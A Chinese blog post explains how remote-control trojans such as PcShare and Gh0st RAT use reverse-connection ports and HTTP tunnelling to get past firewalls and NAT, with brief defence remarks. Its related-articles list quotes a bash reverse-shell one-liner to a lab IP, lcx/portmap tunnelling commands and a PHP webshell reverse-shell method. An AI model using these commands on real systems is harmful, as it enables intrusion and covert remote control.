反弹端口原理与HTTP隧道技术

最新推荐文章于 2023-06-14 16:37:36 发布
最新推荐文章于 2023-06-14 16:37:36 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 木马病毒

http://blog.163.com/feiqiu_13/blog/static/16870088920108123110438/


现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网方式,只要能浏览网页的电脑,这种木马都可以访问到,那么我们有必要了解一下此类木马用到的相关技术。

反弹端口原理:

如果对方装有防火墙,客户端发往服务端的连接首先会被服务端主机上的防火墙拦截,使服务端程序不能收到连接,软件不能正常工作。同样,局域网内通过代理上 网的电脑,因为是多台共用代理服务器的IP地址,而本机没有独立的互联网的IP地址( 只有局域网的IP地址) ,所以也不能正常使用,就是说传统型的同类软件不能访问装有防火墙和在局域网内部的服务端主机。

与一般的软件相反,反弹端口型软件的服务端(被控制端) 主动连接客户端(控制端) ,为了隐蔽起见,客户端的监听端口一般开在80(提供HTTP服务的端口),这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似 TCP UserIP:1026 ControllerIP:80 ESTABLISHED 的情况,稍微疏忽一点就会以为是自己在浏览网页(防火墙也会这么认为的) 。看到这里,有人会问:既然不能直接与服务端通信,如何告诉服务端何时开始连接自己呢?答案是:通过主页空间上的文件实现的,当客户端想与服务端建立连接 时,它首先登录到FTP服务器,写主页空间上面的一个文件,并打开端口监听,等待服务端的连接,服务端定期用HTTP协议读取这个文件的内容,当发现是客 户端让自己开始连接时,就主动连接,如此就可完成连接工作。

HTTP隧道技术
常常使用木马的用户一定对木马所使用的反弹连接技术、线程插入技术等耳熟能详,但是对“HTTP隧道技术”可能就不 甚了解了,那到底什么是“HTTP隧道技术”呢?我们知道,使用了“反弹连接技术”的远程控制软件只能访问拨号上网的服务端以及局域网里通过 NAT 代理上网的服务端。
  而使用“HTTP 隧道技术”以后,远程控制软件可以访问到局域网里通过 HTTP、SOCKS4/5 代理上网的服务端。简单来说,“HTTP 隧道技术”就是把所有要传送的数据全部封装到 HTTP 协议里进行传送。因此,在互联网上可以访问到局域网里通过 HTTP、SOCKS4/5 代理上网的电脑,而且也不会有什么防火墙会拦截。
  可以这么说,使用“HTTP 隧道技术”的远程控制软件几乎支持了所有的上网方式,如:拨号上网、ADSL、Cable Modem、NAT透明代理、HTTP的GET型和CONNECT型代理、SOCKS4 代理、SOCKS5 代理等。
  通过使用反弹连接技 术和HTTP隧道技术后,服务端程序的打开端口一般开为80(即用于网页浏览的端口)。这样稍微疏忽一点用户就会以为是自己在浏览网页,而防火墙也会同样 这么认为,再加上反弹连接型木马的服务端主动连接客户端,这样就可以轻易突破防火墙的限制。 曾经案例
  2005年7月,作为网站管理员的张 庆发现自己所管辖的网站被黑客入侵。通过对网路日志的分析,跟踪到一个IP地址,结果发现该IP地址是一台代理服务器的IP地址。在通过对代理服务器当前 网络连接的分析后,最终锁定黑客真正的IP地址,并确认黑客是通过一款名为Pcshare的木马程序对它进行了控制。而Pcshare就是一款集反弹连接 技术和HTTP隧道技术于一身的木马程序。 简单防御方法
  由于HTTP隧道技术穿透防火墙的能力十分的强大,并且现在只被利用到某些木马程 序之中,所以要防范“HTTP隧道技术”对用户带来的危害,还需要从木马程序的基本防范做起。

  除此以外,我们应该了解哪些木马程序使用了“HTTP隧道技术”,这些木马程序的特点又是什么。据统计,现在 国产木马程序使用了“HTTP隧道技术”的有Pcshare和网络神偷这两款木马程序。网络神偷的清除相对简单,而Pcshare的清除就相对复杂了。 如今又有一款隧道技术木马红狼(Gh0st RAT)。

B/S 型木马
冰河、灰鸽子、红狼都属于C/S型木马,而这里不得不介绍下B/S型木马。
C/S型木马就是通过客户端(Client)对服务端(Server)进行控制操作;而B/S型木马就是通过浏览器(Browser)对服务端 (Server)进行控制操作。
最早的B/S型木马是1998年第七届"DEF CON“黑客大会,由”死牛崇拜(CDC)“组织拿出的BO2000.国内也有个网络精灵,其实是把BO2000进行汉化精简后重新用VC++进行编译封 装。

利用HTTP协议的缺陷来实现对防火墙的渗透,或者说现有的一些HTTP隧道技术的实现,是基于防火墙在对HTTP协议的报文进行识别与过滤时,往往只对 其诸如POST、GET等命令的头进行识别,而放行其后的所有报文。
所以,只要具备了对HTTP的基本认识与基本的C语言或者Perl等编程语言的常识,就可以从事HTTP方面的学习与研究了。
这是C版本的:
http://www.nocrew.org/software/httptunnel.html
虽然是在UNIX下的源代码,但对于了解基本原理与基本实现技术是很好的。
如果需要JAVA和PHP版本的可以到
http://www.ohardt.com/mailbridge/
这里下载,这是一个利用HTTP隧道技术来收发EAMIL的实现。

feier7501
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程控制编程之反弹端口模式
08-28 2401
 远程控制软件的上线模式主要有两种:正向直连模式与反弹端口模式。正向直连模式远控需要输入对方的IP地址和端口(图1),比如Radmin就是正向连接。当被控端是ADSL拨号这种动态IP或者需要监控的机器比较多的话,一个个输入IP和端口是繁琐和不准确的。这时,聪明的远程控制软件开发者们设计了反弹端口模式(图2),比如常见的灰鸽子,PcShare等远控都使用了这个模式。这个模式主要用于两个目的,一是解决
内网转发——反弹端口
cxrpty的博客
03-17 3841
反弹端口:是指受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发 主要指以下情况: -1.访问服务器的3389端口,由于防火墙的原因,我们访问不了3389端口 原因:1.3389端口,防火墙没有开放 2.服务器处于公司内网,对外只发布了80端口 3.3389...
利用socket转发和反弹端口技术突破防火墙进入内
杨德龙的专栏
04-25 3803
 http://www.vfocus.net/art/index_f.htmlTCP端口反弹技术? 反弹技术,该技术解决了传统的远程控制软件不能访问装有防火墙和控制局域网内部的远程计算机的难题。反弹端口型软件的原理是,客户端首先登录到FTP服务器,编辑在木马软件中预先设置的主页空间上面的一个文件,并打开端口监听,等待服务端的连接,服务端定期用HTTP协议读取这个文件的内容,当发现是客户端让
反弹端口 HTTP代理 HTTP隧道技术
whatday的专栏
10-17 5754
现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网方式,只要能浏览网页的电脑,这种木马都可以访问到,那么我们有必要了解一下此类木马用到的相关技术。      反弹端口原理:   
内网转发之反弹端口
broing55的博客
03-17 913
反弹端口实验 实验环境:windows 2008r2服务器 和 本机 实验步骤 win2008服务器开启防火墙,开启3389端口并不对外开放,利用reduh工具使其服务器将其他端口公用。 本地计算机关闭防火墙和杀毒软件,安装java环境和jdk服务 实验流程: 配置虚拟机环境,将远程控制打开 然后将reduh中的aspx文件上传到wwwroot下面 然后本机计算机访问一下...
微机原理与接口技术课件PPT课件.ppt
11-11
该课件包含了微机原理和接口技术的基本概念、微处理器的发展、微计算机系统的组成、计算机的基本结构、微处理器、微计算机、I/O端口、输入输出接口、中断控制器、DMA控制器、A/D与D/A转换、存储器等知识点。...
2023年微机原理与接口技术知识点归纳.doc
11-16
"微机原理与接口技术知识点归纳" 微机原理知识点归纳: 1. 计算机内部信息的存取、解决和传送都是以二进制码形式进行的。 2. 机器字长为8位的有符号数,表达数值的范围是-128到127;8位无符号数的表达数值的范围是...
微机原理与接口技术完整1ppt课件.ppt
01-01
本节将详细介绍微机原理与接口技术的相关知识点,涵盖微机接口、接口技术、I/O端口端口地址译码、CPU与外设之间的数据传送方式等方面的内容。 微机接口 微机接口是微机系统中一个非常重要的组成部分,它扮演着...
微机原理与接口技术实验报告 - 智慧交通路口控制实验
01-21
【微机原理与接口技术实验报告 - 智慧交通路口控制实验】 实验涉及的知识点主要集中在微机系统的接口技术和实际应用上,具体包括以下几个方面: 1. **可编程并行接口 8255 芯片**:8255 是一种常见的并行接口芯片...
端口存储器原理实验.pdf
03-31
端口存储器是一种特殊的存储器件,它...通过这个实验,学生不仅能掌握IDT7132双端口存储器的工作原理,还能体验到半导体存储器在实际应用中的并行处理能力,为将来在嵌入式系统、实时操作系统等领域的工作奠定基础。
浅析Linux之bash反弹shell原理
01-08
环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其
VC直接用socket实现HTTP协议
08-10
VC 实现的socket实现HTTP协议
php反弹,PHP Webshell 下的端口反弹方法
weixin_29421409的博客
03-10 319
使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://www.site.com/phpdkft.php ,本地就会得到一个反弹的shell。这样每次可以直接访问这个ph...
流量映射端口反弹
niqiu320的博客
05-26 853
实验1:LCX端口转发 正向转发 内网主机执行:lcx.exe –slave 公网主机IP 公网主机端口 内网主机IP 内网主机端口 外网主机执行:Lcx.exe –listen 公网主机端口1 公网主机端口2 反向转发 外网主机执行:Lcx.exe -tran 53 目标主机IP 3389 试验二:PORTMAP端口转发 正向转发 内网主机执行:./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666 外网主机执行:./por
NC反弹端口的利用技巧
sineblog的专栏
04-06 4109
首先,我们要在服务器创建一个用于靶场机器下载的webshell,首先要创建服务器,这里我们使用Python的一个模块是simple HTTP server来创建一个简单的http,回到这里,我们首先切换到桌面,CD之后我们来使用passage-m之后,把我们是HTTP simple启动该服务器http server回车那么这时候咱们就开始了一个服务器,并且它的根目录是在桌面的,所以说我们直接访问该机器的IP地址加上对应的这个800端口就可以下载到该shell。 同时我们也发现刚才所写的这个 sh.
反弹连接技术
weixin_30341745的博客
11-28 1131
应用 现在的远程控制软件很流行使用反弹连接技术。反弹技术的诞生,是为了解决传统的远程控制软件不能访问装有防火墙以及不能控制局域网内部的远程计算机。 域名反弹连接的原理很简单 编辑本段 服务端程序运行后,主动连接一个网络域名或IP地址,而本地用户通过客户端程序及时将电脑当前的IP地址及打开的端口更新到网络域名,这样服务端程序就可以成功连接到客户端,从而完成连接。因此通过反弹连接技术就可以在互联网上...
LCX VIDC端口反弹不通过网关开放任意内网端口
weixin_34174132的博客
07-06 132
今天给大家说说如何巧用端口映射,不通过网关开放内网的方法。  一:使用前提  需要有一台公网的IP。假如现在我们有一台公网的IP :210.210.21.21  二:用到的工具  1.lcx.exe  2.vdic  三:方法讲解  方法一:用lcx.exe进行映射。  (1)我们将lcx.exe传到公网IP上,在公网IP上DOS环境下执行 lcx –listen 端口1 端...
内网渗透之——内网转发(反弹shell、端口、代理)
热门推荐
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
端口代理反弹shell原理应用
最新发布
qq_39641273的博客
06-14 385
我们发现在实际的攻击过程中,使用常规反弹shell攻击者的计算机IP地址将被暴露给受害者计算机,因为攻击者需要将自己的计算机IP地址提供给受害者计算机以建立连接。当对方具备一定的抓包和溯源能力就能借此溯源到攻击者。因此,对方反弹shell攻击可能会危及攻击者的匿名性和安全。这些技术可以用来隐藏攻击者的真实IP地址,从而增强攻击的匿名性和安全性。下面是一些常用的增强反弹shell匿名性的技术:端口转发:攻击者可以使用端口转发技术将流量从受害者计算机转发到攻击者的计算机上,从而隐藏自己的真实IP地址。
TCP与UDP端口扫描实验教程:原理、实施与防护
"网络协议分析文档教程,主要讲解TCP与UDP端口扫描的原理、方法以及安全防范措施。实验旨在让学习者理解这两种扫描技术,并提高网络安全意识。文档中提供了实验环境配置、实验内容和流程,以及相关的端口基础知识。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值